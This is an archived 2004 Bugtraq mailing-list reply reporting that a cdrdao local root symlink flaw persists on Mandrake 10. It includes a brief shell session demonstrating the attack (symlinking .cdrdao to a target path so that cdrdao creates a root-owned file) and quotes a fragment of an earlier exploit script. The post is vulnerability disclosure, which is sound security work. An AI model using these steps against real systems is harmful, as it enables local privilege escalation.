| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 1 Oct 2004 19:05:58 -0000 From: newbug Tseng <newbug@...oot.org> To: bugtraq@...urityfocus.com Subject: Re: cdrdao local root exploit In-Reply-To: <1157225765.20040907131857@...URITY.NNOV.RU> The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2). I think cdrdao should drop root permission before save the config. [newbug@...alhost tmp]$ ls -al /blah ls: /blah: No such file or directory [newbug@...alhost tmp]$ ln -s /blah .cdrdao [newbug@...alhost tmp]$ rpm -qf `which cdrdao` cdrdao-1.1.9-5mdk [newbug@...alhost tmp]$ cdrdao blank --save . . . [newbug@...alhost tmp]$ ls -al /blah -rw-rw-r-- 1 root cdwriter 32 10月 2 10:41 /blah [newbug@...alhost tmp]$ newbug Tseng >Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000 >Received: from mail2.securityfocus.com (205.206.231.1) > by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000 >Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000 >Delivered-To: archive-bugtraq@...urityfocus.com >Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26) > by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing2.securityfocus.com (Postfix) with QMQP > id 4864914374E; Tue, 7 Sep 2004 09:06:54 -0600 (MDT) >Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@...urityfocus.com> >List-Help: <mailto:bugtraq-help@...urityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com> >Delivered-To: mailing list bugtraq@...urityfocus.com >Delivered-To: moderator for bugtraq@...urityfocus.com >Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000 >Date: Tue, 7 Sep 2004 13:18:57 +0400 >From: 3APA3A <3APA3A@...URITY.NNOV.RU> >Reply-To: 3APA3A <3APA3A@...URITY.NNOV.RU> >Organization: http://www.security.nnov.ru >X-Priority: 3 (Normal) >Message-ID: <1157225765.20040907131857@...URITY.NNOV.RU> >To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias@...amail.com> >Cc: bugtraq@...urityfocus.com >Subject: Re: cdrdao local root exploit >In-Reply-To: <20040905191642.18379.qmail@....securityfocus.com> >References: <20040905191642.18379.qmail@....securityfocus.com> >MIME-Version: 1.0 >Content-Type: text/plain; charset=Windows-1251 >Content-Transfer-Encoding: 8bit > >Dear Jйrфme ATHIAS, > >This bug was originally reported to Bugtraq by Andreas Mueller on >January, 15 2002 > >--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq@...urityfocus.com: > >JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao" > > > >-- >~/ZARAZA >Неприятности начнутся в восемь. (Твен) > >
Powered by blists - more mailing lists